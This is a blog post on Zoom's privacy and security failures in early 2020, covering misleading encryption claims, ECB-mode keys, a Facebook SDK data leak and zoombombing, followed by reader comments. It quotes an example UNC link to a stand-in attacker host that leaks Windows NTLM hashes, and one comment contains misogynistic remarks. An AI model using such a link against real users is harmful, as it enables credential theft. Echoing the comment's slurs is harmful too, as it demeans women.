Security and Privacy Implications of Zoom

Over the past few weeks, Zoom’s use has exploded since it became the video conferencing platform of choice in today’s COVID-19 world. (My own university, Harvard, uses it for all of its classes. Boris Johnson had a cabinet meeting over Zoom.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.

In general, Zoom’s problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.

Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.

The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.

Last month, Zoom’s privacy policy contained this bit:

Does Zoom sell Personal Data? Depends what you mean by “sell.” We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace. So in our humble opinion, we don’t think most of our users would see us as selling their information, as that practice is commonly understood.

“Depends what you mean by ‘sell.'” “…most of our users would see us as selling…” “…as that practice is commonly understood.” That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who “download[ed] an app from the Marketplace” remember consenting to them giving your personal data to third parties? I don’t.

Doc Searls has been all over this, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.

On March 29th, Zoom rewrote its privacy policy:

We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.

[…]

We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.

There’s lots more. It’s better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages “marketing websites,” which means it’s still using third-party trackers and surveillance based advertising. (Honestly, Zoom, just stop doing it.)

Now security: Zoom’s security is at best sloppy, and malicious at worst. Motherboard reported that Zoom’s iPhone app was sending user data to Facebook, even if the user didn’t have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

“We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

This isn’t the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user’s web camera without the user’s knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.

On 4/1, we learned that Zoom for Windows can be used to steal users’ Window credentials.

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings — such as \attacker.example.com/C$ — into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

On 4/2, we learned that Zoom secretly displayed data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)

I’m sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.

But it gets worse. Zoom’s encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn’t. It only provides link encryption, which means everything is unencrypted on the company’s servers. From the Intercept:

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

They’re also lying about the type of encryption. On 4/3, Citizen Lab reported

Zoom documentation claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.

The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China.

I’m okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.

And that China connection is worrisome. Citizen Lab again:

Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom’s software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

Finally, bad user configuration. Zoom has a lot of options. The defaults aren’t great, and if you don’t configure your meetings right you’re leaving yourself open to all sort of mischief.

Zoombombing” is the most visible problem. People are finding open Zoom meetings, classes, and events: joining them, and sharing their screens to broadcast offensive content — porn, mostly — to everyone. It’s awful if you’re the victim, and a consequence of allowing any participant to share their screen.

Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. Turns out that Zoom didn’t make the meeting ID long enough to prevent someone from randomly trying them, looking for meetings. This isn’t new; Checkpoint Research reported this last summer. Instead of making the meeting IDs longer or more complicated — which it should have done — it enabled meeting passwords by default. Of course most of us don’t use passwords, and there are now automatic tools for finding Zoom meetings.

For help securing your Zoom sessions, Zoom has a good guide. Short summary: don’t share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.

That’s what we know about Zoom’s privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.

Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it’s in the spotlight, it’s all coming out. (Their 4/1 response to all of this is here.) On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let’s see if that’s anything more than a PR move.

In the meantime, you should either lock Zoom down as best you can, or — better yet — abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.

EDITED TO ADD: Fight for the Future is on this.

Steve Bellovin’s comments.

Meanwhile, lots of Zoom video recordings are available on the Internet. The article doesn’t have any useful details about how they got there:

Videos viewed by The Post included one-on-one therapy sessions; a training orientation for workers doing telehealth calls, which included people’s names and phone numbers; small-business meetings, which included private company financial statements; and elementary-school classes, in which children’s faces, voices and personal details were exposed.

Many of the videos include personally identifiable information and deeply intimate conversations, recorded in people’s homes. Other videos include nudity, such as one in which an aesthetician teaches students how to give a Brazilian wax.

[…]

Many of the videos can be found on unprotected chunks of Amazon storage space, known as buckets, which are widely used across the Web. Amazon buckets are locked down by default, but many users make the storage space publicly accessible either inadvertently or to share files with other people.

EDITED TO ADD (4/4): New York City has banned Zoom from its schools.

EDITED TO ADD: This post has been translated into Spanish.

Posted on April 3, 2020 at 10:10 AM80 Comments

Comments

Cheetah April 3, 2020 10:57 AM

While Jitsi’s open source nature is great for privacy and whatnot, having used it for the better part of a year at my employer before abandoning it, I can say that its functionality and reliability is among the worst of any video conferencing solution I’ve used.

That said, given everything that’s been coming out, I’m glad we’re moving away from Zoom too.

Of course, who knows if the next solution we’re moving to is actually any better *sigh

Tatütata April 3, 2020 11:17 AM

I learned of the existence of Zoom and Zoombombing this week as I was helping an old friend to look into teaching undergraduate courses from home for the upcoming summer semester. I was going to prepare a small side dish for today’s serving of squid, but this topic beat me to it.

Right now, I’m looking into lighting and sound, but with zero budget and most stores being closed anyway, it requires a bit of imagination. I’ll try I backlit bed sheet for providing diffuse lighting, and I have a good desk microphone somewhere. I realized the importance of providing good conditions when I saw the day-to-day progression in home-broadcasting quality from late show hosts, especially Stephen Colbert from the US, who helped me remain kinda-sortof sane in the last four years.

The university provided courseware is Windows-centric, a minor peeve as my friend uses a Fisher-Price computer. (Sorry, I really meant to put in the name of a fruit).

What I find rather galling however is that it is Adobe-Flash based. In 2020. Dammit.

Is there perhaps an open-source alternative to all that cr*p?

AlanS April 3, 2020 11:31 AM

I wonder how much Zoom’s privacy and security issues carry over to other apps. RingCentral, a Zoom competitor, uses a licensed version of Zoom for video conferencing. Ring Central has just announced that it is replacing Zoom with it’s own video conferencing service:

“This completes the RingCentral phone, messaging and video solution,” Long said. “We recognized that we could do it better because we are a carrier and wanted to build something of our own. RCV is purpose-built inside the RingCentral platform.” RingCentral has previously gone to market with a video offering — RC Meetings — powered by Zoom Video Communications…. RCV, unlike some competitive offerings that are facing security and privacy issues right now due to increased usage, is a secure offering, Long said. “RCV offers state-of-the-art data encryption and multi-layer security, and no downloads or plug-ins required,” he added.

I’m sure they will also come under some scrutiny so we will see.

La Abeja April 3, 2020 12:23 PM

Zoom’s iPhone app was sending user data to Facebook, even if the user didn’t have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

“We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform.

These issues are primarily business decisions. You can’t expect some company to go in business making and selling cameras without somehow connecting to Facebook’s enormous “cam whore” userbase.

“Math is hard,” and “the girls” (among Facebook’s huge userbase) are unwilling to get their fingers dirty with anything technical, when they can so easily achieve social popularity, find employment, get male customers, and make money on the basis of their appearance.

To get “hacked” and have some “embarrassing” photo or video “go viral” is almost a dream come true for them. It just earns them more male followers, and if they have any trouble, they just call the cops, who are already do eager to identify and arrest any male subject of age on Facebook.

There are bigger and more severe problems yet to solve with camera security.

James April 3, 2020 12:37 PM

  • On April 4 last year (2019) I wrote to Zoom:

I downloaded Zoom to my Mac. I notice that there is a Company Contacts with 453 names. I added NONE of those, and I assume that I know none of them.

The ones that I have looked at are all with “telusplanet.net”, which is an ISP and is NOT a company.

This reveals their names and their emails to me, which is an utterly unacceptable invasion of THEIR privacy.

It also implies that if anyone else from “telusplanet.net” downloads your app, MY name and email will be distributed to them. This is also utterly unacceptable.

I tried to delete their information, and was utterly unable to figure out how, either online here, or in the Mac app. Your documentation does not tell me now to do that, at least not in any easy-to-find way.

  • After a couple of information interchanges, on April 11 (2019) Zoom wrote:

I will check on this further and get back to you.

Victor

  • They never did get back to me.

Nathan Buuck April 3, 2020 12:58 PM

I found it troubling that their calendar integration with Exchange Online requires the “EWS.AccessAsUser.All” permission, allowing their app to read all contents of a user’s mailbox, rather than a more constrained and in my opinion appropriate permission like “Calendar.ReadWrite”. I asked them about this recently on Twitter but not surprisingly haven’t received a response yet because of all the other interest in Zoom.

Bob Paddock April 3, 2020 1:10 PM

How does one do end-to-end encryption for N-incoming sources to K-outgoing clients with no noticeable lag to all clients? Where N and/or K can be in the tens of thousands.

Real world bandwidths would prevent every point in this setup from connecting to every other point directly, beyond some small numbers for N and/or K.

Bruce Schneier April 3, 2020 1:56 PM

@Bob Paddock:

“How does one do end-to-end encryption for N-incoming sources to K-outgoing clients with no noticeable lag to all clients? Where N and/or K can be in the tens of thousands.

“Real world bandwidths would prevent every point in this setup from connecting to every other point directly, beyond some small numbers for N and/or K.”

One does not. But, if one is ethical, one doesn’t turn around and claim that they do.

Bruce Schneier April 3, 2020 2:07 PM

“How about Wire? It seems to fit the bill for secure videoconferencing.”

I don’t know it.

Kevin April 3, 2020 2:40 PM

How is it that Zoom has been claiming to have end-to-end encryption, and no one (security researchers or whistleblowers at Zoom) has not called them out on it until now?

Andy April 3, 2020 3:35 PM

“I’m okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.” — how do you encrypt over an inconsistent connection where connection drops and server can’t afford to re-transmit ?

Anders April 3, 2020 4:31 PM

Any info on GoToTraining?

mobile.twitter.com/curi0usJack/status/1243637574780018688?p=v

Bruce Schneier April 3, 2020 5:46 PM

@Andy:

“…how do you encrypt over an inconsistent connection where connection drops and server can’t afford to re-transmit?”

There are lots of crypto synchronization options for all sorts of situations. This is the kind of thing that has been studied since the days of radio.

RRD April 3, 2020 5:58 PM

[All, I didn’t see this post before I posted this in the Friday Squid post, so I’m re-posting below and then adding an ‘ignore’ post below my Squid post. Sorry, Bruce et al.]

As someone who just installed Zoom.us on our Ubuntu laptop (and then uninstalled it a few days later), I have four questions (first rhetorical as a point I’ve not seen anyone mention; pls correct me if it’s already been brought up in these parts):

  1. If you wanted to collect facial recognition data on another country’s citizens, what better app to create than a free video teleconferencing solution? (Of course, that image data will be cross-correlated with whatever other internet metrics are used to identify us.)
  2. Can I trust Ubuntu to truly know how to completely remove all its components after I use the admin function to uninstall it? (i.e. Could it have left components behind, like an open web server?)
  3. How can I (within Ubuntu or Linux in general) know precisely which components it installed (b/c I will have to reinstall it in a few days) or can sudo’d installations keep modifying their codebase days after install, allowing them to present one footprint immediately after install that then gets modified sometime later to add the actual malware bits? Obviously, if it runs, e.g., a Scheme interpreter or somesuch it can always download a source file and run it on the fly, but my question is only about binaries injected into the operating system code at some later date. (Essentially I’m asking how long that ‘sudo’ remains in effect in terms of allowing system modification.)
  4. How feasible would it be to run Zoom in a dedicated virutal machine on my modern (only a few years old) Ubuntu 64-bit machine, and which virtual machine tech would you suggest for isolating 3rd party apps on such a machine?

As a serious longtime software engineer who has spent quite a bit of time over the years learning about installation and config of OSs from OpenBSD to Linuxes to Windowses, I’m more than willing to wipe the box and reinstall Ubuntu to ensure that Zoom is gone, but I’d really rather not, if I don’t have to.

God bless you all and may peace be with you in this trying time. Love is the answer to all our problems because the selfish lack of loving compassion is their only source. Thanks in advance.

Clive Robinson April 3, 2020 6:07 PM

@ Bruce,

This is the kind of thing that has been studied since the days of radio.

I hate to disagree with you but you need to add a “before” before radio.

Michael Vilain April 3, 2020 6:13 PM

The fact that Zoom uses Chinese programmers to develop their code base isn’t new. Years ago when Cisco bought WebEx and turned it into the PaaS it is today, it bought the Chinese programmers that developed it. They still develop it. The handful people that administer the FedRAMP version WebEx, which uses the same code base as the customer version, must be US Citizens. WebEx’s Chinese programmers can still supposedly insert code into WebEx at the behest of the PRC.

David Leppik April 3, 2020 6:25 PM

@AlanS:

A lot of the newer competitors are using WebRTC, a Web standard for building VOIP and video services directly from the browser. All the major web browsers support it. It’s not as easy to set up as most web services, but I’ve done it, and I would expect an experienced developer to get it up and running in a few weeks.

The other advantage of WebRTC is that because it’s implemented in the web browser, it’s implemented by people who know security. That said, it has a huge amount of surface area for developers to get security wrong. In particular, the communication channel for initially setting up the peer-to-peer connection is not part of the API; developers have to write it themselves.

Also Twilio offers videoconferencing APIs built on top of WebRTC, including support for group chat and the like. Merging a group video stream is done on Twilio’s servers, so not end-to-end encrypted for large groups. I haven’t used it, but it makes it possible to build something with most or all of Zoom’s features without requiring users to install software.

Zoom’s secret sauce is how easy their user interface is, which is something that is easy to underestimate and harder to copy than most people realize. A good UI is all about sweating the little details. That’s especially important in videoconferencing, when non-technical people are on the spot to find the right control at just the right moment. It’s not impossible that some competitor will swoop in and replace Zoom. I could see Slack doing it if they wanted.

Zoom has a huge amount of traction right now. I just spent the last several weeks helping non-tech-savvy members of my church get Zoom running for virtual services; this is not a process anyone wants to repeat with a new service. For better or worse, Zoom is here to stay.

lurker April 3, 2020 7:25 PM

More than twenty years ago the educational establishment I worked at was looking for a video system for online teaching. A large part of the problem was the most popular operating system of the time was not very good (speaking politely) in handling decent quality video, maintaining video-audio synch, or handling standards compliant internet streaming. My employers were unwilling to allow me the amount of time needed to put VLC into a fit state for us, and our aim shifted from a broadcast service to random students, to a point-to-point service, lecture room to lecture room. The upper echelons must have been lunched by some slick salesdroids, we ended up with a very expensive bespoke system, and somebody else was assigned to keep and feed it.

Since then the market has expanded widely, both in bespoke systems, and free (money and/or open source) systems. The Intercept article(1) clearly shows that the most popular operating system has not improved in proportion. Zoom appears to be both exploiting some of its weaknesses and falling prey to others. Zoom is claimed to be easy to install, simple to use. Is it also the cheapest? People want point ‘n click, and most definitely do not want to be messing around under the hood.

Clear recording of video should only be possible at the endpoints. Allowing it to happen somewhere down the line is a tradeoff of security against convenience. But video recordings can also occupy a lot of disk space, so there is a need for willpower to archive or delete.

Something has puzzled me ever since the early days of Skype, setting up accounts for academics. Why is a centralised directory server needed? If those communicating are from a small group already known to each other, their addresses are known via DNS. [!] PGP and TLS have been around for years, so a simple exchange of tokens could verify users joining a conference, and traffic can be end to end encrypted. BitTorrent doesn’t need a centralised directory, and it can encrypt traffic if desired, and negotiate NAT. Oh wait, isn’t BitTorrent used by those nasty hackers to swap pirated movies?

(1) https://theintercept.com/2020/03/31/zoom-meeting-encryption/

AlanS April 3, 2020 8:29 PM

@David Leppik

Thanks. Yes, RingCentral is using WebRTC. It appears that they did a lot of work on it. The interface looks cleaner than their old Zoom-based video conferencing.

La Abeja April 3, 2020 8:37 PM

@David Leppik, AlanS

RingCentral vs Zoom?

What’s the difference? Up to any technical merit, all the major brands are made by the same Chinese government.

And I mean city hall. Xi Jinping might be a little bit too much president-for-life, but he’s not really “the problem” at that level.

Craig April 3, 2020 9:38 PM

I’d love to see a comparison of the security of Zoom vs. Teams, Hangouts, GoToMeeting, WebEx, etc.!

What I’m trying to figure out is if Zoom is substantially less secure than other options or if it’s just more scrutinized than the others with its explosion in popularity. Zoom is definitely shadier from a privacy standpoint and have made some intentional decisions that were security fails, but how do the other products encryption practices compare? What other bugs have others and how do they compare in frequency severity?

Bruce Schneier April 3, 2020 10:23 PM

@Craig:

“What I’m trying to figure out is if Zoom is substantially less secure than other options or if it’s just more scrutinized than the others with its explosion in popularity.”

I don’t know. My guess is that it’s just under the microscope right now.

Daniel April 4, 2020 4:01 AM

Many people recommend Jitsi these days. However, the Jitsi apps on Play Store and Apple Store contain lots of trackers, the official Jitsi instances (like meet.jit.si) contain trackers, and there are widely-reported performance issues.

Moreover, E2EE is only supported for P2P calls. Group calls are only using TLS. So Jitsi is far from perfect.

Daniel April 4, 2020 4:06 AM

Jitsi:
Only P2P calls are end-to-end encrypted. Group calls are using TLS only.
There are huge performance issues when there are more than about 8 people in the call.
The official Jitsi app contains lots of trackers, the same is true for the web clients.

RealFakeNews April 4, 2020 5:17 AM

Dumb question: how does YouTube do it?

AFAIK the video is “end to end” encrypted; i.e. the page is SSL/TLS all the way, no mixed content.

I think we under-estimate what we can actually do with modern hardware.

Limit to 24 FPS (same as movies) at HD resolution. For modern communications networks this surely isn’t unreasonable anymore?

I think some people are stuck with 1996 dial-up thinking.

Sven Türpe April 4, 2020 5:17 AM

I miss proper risk assessment, so let us work backwards from the consequences:

  1. What is the worst thing that ever happened to any individual or organization as a result of using Zoom?
  2. What are the most likely actual – not merely possible or imagined – consequences of using Zoom for any individual or organization?
  3. How do the risks from using Zoom compare to other cyber risks, such as the prevalent ransomware threat?
  4. Which alternatives remain viable after all costs and all requirements have been considered?

Finally, does any of this even matter in comparison with the emerging societal and economic impact of the coronavirus pandemic?

Clive Robinson April 4, 2020 5:41 AM

@ Lurker,

Something has puzzled me ever since the early days of Skype, setting up accounts for academics. Why is a centralised directory server needed?

You can always get a communications system to function without a centralised directory. Because interactive communications is inherantly two one way point-to-point Shannon Channels. This is true even when it’s multiparty communications.

However before you can open any form of communications channel you have to know two things,

1, Where the First Party is located.
2, Where the Second Party is located.

Whilst you as the first party can determin your position you don’t know where the second party is. Finding out is the “Discovery phase” of a “rendezvous protocol” that alows you to meet up.

Thus you have to,

1, Know (local dictionary).
2, Be told (central dictionary).
3, Find (locate protocol).

There are two ways to “find”,

1, By “broadcast”.
2, By “search”.

That is in a dark room you shout out “Fred where are you” that is a “broadcast”. Alternatively you go to each seat in the room in turn and whisper that is a “search”. You can quickly see that either way is grossly in efficient at some point in scale.

Local dictionaries like pocket address books are convenient when people are in fixed locations, but they become inefficient due to duplication of stored records. Thus a central directory at a known place is the most efficient way for a user to both get and store fixed location data.

However the central directory can actually be distributed that is a user uses a local fixed request point and this first queries a local directory, if not in there then it knows how to find the next directory to look in. In essence that is how very large effectively “read only” databases like DNS or LDAP work.

All well and dandy for fixed locations but what if the users are mobile?

Well you will find the only bandwidth efficient way is to use what is a central directory that is distributed. As a mobile moves from one network node to another it updates both a local or regional directory segment with your location and less frequently a central directory.

Without going into all the nitty gritty details of how it works and sometimes fails it’s how the GSM mobile phone networks know where or how to efficiently search for the network node the second party is at.

Anselm April 4, 2020 7:04 AM

I just opened a Jitsi Meet conference on my system. According to the EFF’s Privacy Badger the page contacts no trackers whatsoever.

Clive Robinson April 4, 2020 7:16 AM

@ Craig,

What I’m trying to figure out is if Zoom is substantially less secure than other options

Remember that “security” is about the weakest link in the chain, and with communications involved where the communications end point is with respect to the security end point.

I’m known for saying that the security in messaging apps is in effect a “pi55ing contest” because the human computer interface is not just past the apps security end point, but well within the scope of the communications end point as it’s on the same device.

Thus it’s not just the application code that has to be secure, all the libraries the code uses have to be secure, the API’s into the OS kernel have to be secure, the OS has to maintain good user seperation security, also good device driver API security, the device drivers have to be secure, and beneath all that the CPU and memory has to be secure, beneth that other hardware has to be secure, all the way down to the device physics.

All because of the way our computing model works, and the computing stack it creates all lower levels are a danger to all levels above… Worse attacks like RowHammer can “reach around” all the software and hardware security layers from the untrusted user level down to the memory level…

If you want even minimal privacy then you need to fix or mitigate one heck of a lot of things.

Currently the only way you’ve realy got is “mitigation by segregation” in your tool box, and whilst it’s a deceptively simple tool it’s darn difficult to use correctly, especially with Governments and Corporations fighting to stop you having privacy.

Clive Robinson April 4, 2020 10:23 AM

@ Sven Türpe,

To answer your questions,

1, Unknown but could be catastrophic see use by Boris Johnoson and the Chinese originated encryption keys…

2, Again Unknow it depends on who the users and the attackers are and their respective actions.

3, Ransomware whilst in vogue at the moment is limited in scope, likewise Zoom is limited in scope, it depends on if the scopes intersect or not and by how much. So pick your attack method of choice and first compare it’s relevance to the application. If it’s not relevant than you can spend time more usefully looking at more relevant attacks. See my anser to your first and second questions.

4, see myanswer to your third question.

With regards your final unnumbered question about relevance to COVID-19 see my answer to your second question.

Like “insider trading” knowing what people are planning to do can be worth not just a fortune but can effect a nations economy.

I’ve no idea what the UK Prime Minister Boris Johnson and the UK Ministers of state said in their “Cabinet Meeting” but we can assume they were maters of some national importance. No doubt such deliberations would be of interest to many National Governments not just those of China.

Thus you might want to ask yourselve which SigInt Agencies Governmental or Corporate have the ability to break TLS and get the encryption keys via say a “man in the middle attack” or something a little more complex.

Mike D. April 4, 2020 11:09 AM

Motherboard has an article on Zoom’s Company Directory feature, which shows you personal information for everyone in your email domain, unless your domain is on a blacklist (which most smaller ISPs that provide email are not).

A blacklist. Ugh. What a dumpster fire.

I don’t even want to know what it would do with an email address like mine in the utexas.edu domain. That domain is for personal staff, student, and alumni email, migrated to gmail from our old self-served mail.utexas.edu domain. We have many other domains we still serve ourselves of the form departmentname.utexas.edu.

Company directories should not be auto generated except by the company in question.

Wael April 4, 2020 2:29 PM

@Clive Robinsoin, @Thoth,

You might see a few points that indicate the presenter reads this blog 😉

Like when he says, @2:14:

“You read Schenier, you read Anderson…”?

Now this’s funny:

14th century thinking Defence in depth, walls, gates, aligators, @2:36 “aligators in the moat”.

First of all, we (no, not the team/leadership “we”: this’s the Royal and Narcissist “we” – lol) I advocated defense in depth, width, and hight. Defence in depth is so yestercentury. Higher dimensions are also possible. And a picture of a Castle, too! How clever 🙂

Second of all: damnit! I said “Corocodiles” — not “Aligators”. OK – I’ll meet you half way: “Crocogators” 🙂

Some rabmlings about:

Software infinatley maliable […] Other side: Everything on fire. Nothing can be fixed… everything broken

No comments…

paranoid fantacy: 5:06 – paranoid fantacy: we can control whats going on by hiding everything in a buncker “isolation”

Ummm … “Energy Gap”?

6:15 NSA ran version 6 Unix […] paranoia?

You don’t know what paranoid is – spelling mistakes and all. I need to update my Copyright list

Then again, that qualifies as @Nick_P’s HW duel of old x486.

[…] fast forward, I got bored.

@8:04 faith-based security? […] @26:52 “AnC” Attack – Unknown unknowns […] @39:58 idIOT

Where are the black swans? 🙂

@52:09 can’t leverage TPM on FreeBSD… hmm!

I admit I havent tried it, although it was on my queue for quite sometime, but I couldn’t allocate the time. I thought there was FreeBSd support already:

https://www.freebsd.org/cgi/man.cgi?query=tpm&sektion=4
Open Source TSS: https://software.intel.com/en-us/blogs/2018/08/29/tpm2-software-stack-open-source
IBM: https://sourceforge.net/projects/ibmtpm20tss/
https://papers.freebsd.org/2019/bsdcan/stanek-improving_security_of_the_freebsd_boot_process/
https://www.freebsd.org/cgi/man.cgi?query=tpm&manpath=FreeBSD+12.0-RELEASE+and+Ports 2010

Yup, I guess he frequented this blog for sometime. Would be nice to see him contribute here.

RayK April 4, 2020 5:23 PM

Cross posted to:

https://krebsonsecurity.com/2020/04/war-dialing-tool-exposes-zooms-password-problems/comment-page-2/#comment-507288

On Zoom

As long standing and highly qualified professionals in various disciplines, we decry Zoom as the typical start up that we have seen hundreds of times and that we continue to see.

Best summarized by my paraphrased remarks by one of my silver haired, grizzled veteran associates, JBW:

… These startups are made up of idealistic dreamers with little or no real world experience, who are pursuing their dreams with complete ignorance of, or blatant disregard for, the experience, knowledge, best practices and standards of every aspect of their efforts from the architecture and management of their organizations to the design, implementation, deployment and continual improvement of their products or services…

“But, Zoom is now the cat’s meow”, you say?

To that I say, check this out:

Why We Should All Be Done With This Modern Culture Bullshit

https://thoughtcatalog.com/ellen-nguyen/2015/04/why-we-should-all-be-done-with-this-modern-culture-bullshit/

This has been the question that critical thinkers have continually asked throughout the history of our species.

No, I’m not a cynic. I’m a brutally honest critic who tries very hard to deal only with the facts, especially where they invalidate my most closely held opinions.

I used to be disgusted. Now, I try to be merely amused.

RayK

tfb April 5, 2020 7:29 AM

Bob Paddock asked

How does one do end-to-end encryption for N-incoming sources to K-outgoing clients with no noticeable lag to all clients? Where N and/or K can be in the tens of thousands.

I am clearly missing something here. If you agree some unique symmetric key per session (where a ‘session’ is a conference or something), then everyone needs to have a copy of it, and the broker in the middle needs not to have it, but does not need it. There’s no nasty everyone-needing-to-encrypt-for-everyone-else thing: everyone encrypts and decrypts with the session key.

So then you need to distribute it to people, but I think this just needs the broker to put anyone joining the session in contact with some existing participant and they then do some key exchange with the existing participant handing the new one the session key, which is a one-to-one communication.

Rotating the session key would be a pain, but even then a finite one: someone gets selected to make the new key and then walks over all the participants sending it to them.

Obviously this is all vulnerable to participants you may not trust.

So, clearly I’m missing something obvious.

Trung April 5, 2020 7:41 AM

Zoom might fix other problems, but not this: “..Chinese programmers slipping backdoors”

Spartacus April 5, 2020 7:53 AM

@Baby Yoda I find it sad that you both treat Bruce as so easily dismissed, and yet assume that he writes a post on the basis of a stock position. That implies that you think, simultaneously, that Bruce is both totally irrelevant and yet also so widely followed that his post would move the stock price in a way he could take advantage of.

How’s that cognitive dissonance working out for you?

Jon Lebkowsky April 5, 2020 10:19 AM

Re the added comment about “lots of Zoom video recordings are available on the Internet”…

My understanding is that those are videos that users downloaded from Zoom and uploaded to YouTube without setting private. Blaming Zoom for this would be like blaming Apple when users post sensitive iPhone videos on YouTube. I think there’s blood in the water at the moment, and a bit of a pile-on.

somebody April 5, 2020 11:39 AM

What is the safest easiest way for a group of a dozen talkative nontechnical people, using different devices, to meet online, when nothing visual needs to be communicated?

Clive Robinson April 5, 2020 12:00 PM

@ tfb,

So, clearly I’m missing something obvious.

Err yes I think you might be.

In a multiparty interactive communication you have two basic toppology choices[1],

1, Have a comms channel from every party to every other party.

2, Have a central “mixing hub” where every party has one channel to the mixing hub.

It’s fairly obvious that at even very low numbers of participents (4) it’s more efficient to use a central mixing hub as the number of channles will rise by one for each additional participent rather than N channels where N was the number of previous participents. But also with a central mixing hub you only need it to have significant computational power as opposed to all nodes needing significant computational power.

Which means you can make the mixing node using dedicated hardware, thus easily increasing the number of potential participents, but also spreading the cost of the mixing hub across many sets of customers.

However the problem is, the mixing hub would be outside of the security perimeter, and it needs the “secret” keys for the central mixing hub to work. Because it has to be able to decrypt all of the incomming streams, mix them together, then reencrypt the result before sending it to all participants.

And it’s this “mixing hub” that causes not just the security problems, it’s also a single point of failure, thus the weakest link in the chain.

[1] There are other ways such as a “ring topology” but they all tend to increase not just delay but node costs significantly as well.

Clive Robinson April 5, 2020 12:26 PM

@ somebody,

Is there a simple secure telephone-based solution?

The simple answer is NO.

To see why read my above replies to Lurker, Craig, Sven, and tfb,

https://www.schneier.com/blog/archives/2020/04/security_and_pr_1.html#c6808728

https://www.schneier.com/blog/archives/2020/04/security_and_pr_1.html#c6808735

https://www.schneier.com/blog/archives/2020/04/security_and_pr_1.html#c6808750

https://www.schneier.com/blog/archives/2020/04/security_and_pr_1.html#c6808796

The problem is at the end of the day as I’ve said on several occasions in the past,

    You can not have a secure system when the communications end point can reach beyond the security end point, and no current consumer solution alows you to fix this problem. Therefore unless you take additional measures to move the security end point your communications can not be secure.

Whilst moving the security end point beyond all communications end points sounds seductively simple, it’s not and easily prone to both technical and human failures.

As I’ve been saying this for a number of years, and with the exception of just one or two people, nobody outside of a few select circles –where security is taken a little more seriously– has actually addressed the issue, we can assume the “eavesdropers” be they Corporate or Government will carry on with their industrialised rape of peoples privacy.

Glen Robertson April 5, 2020 12:54 PM

Bruce, thanks for the succinct clarity and information expressed in a concise manner. I realize you don’t need extra followers but many government leaders and key agencies would be much safer if they invested a few minutes to keep abreast of your vital observations. Thank you.

tfb April 5, 2020 1:13 PM

@Clive Robinson:

However the problem is, the mixing hub would be outside of the security perimeter, and it needs the “secret” keys for the central mixing hub to work. Because it has to be able to decrypt all of the incomming streams, mix them together, then reencrypt the result before sending it to all participants.

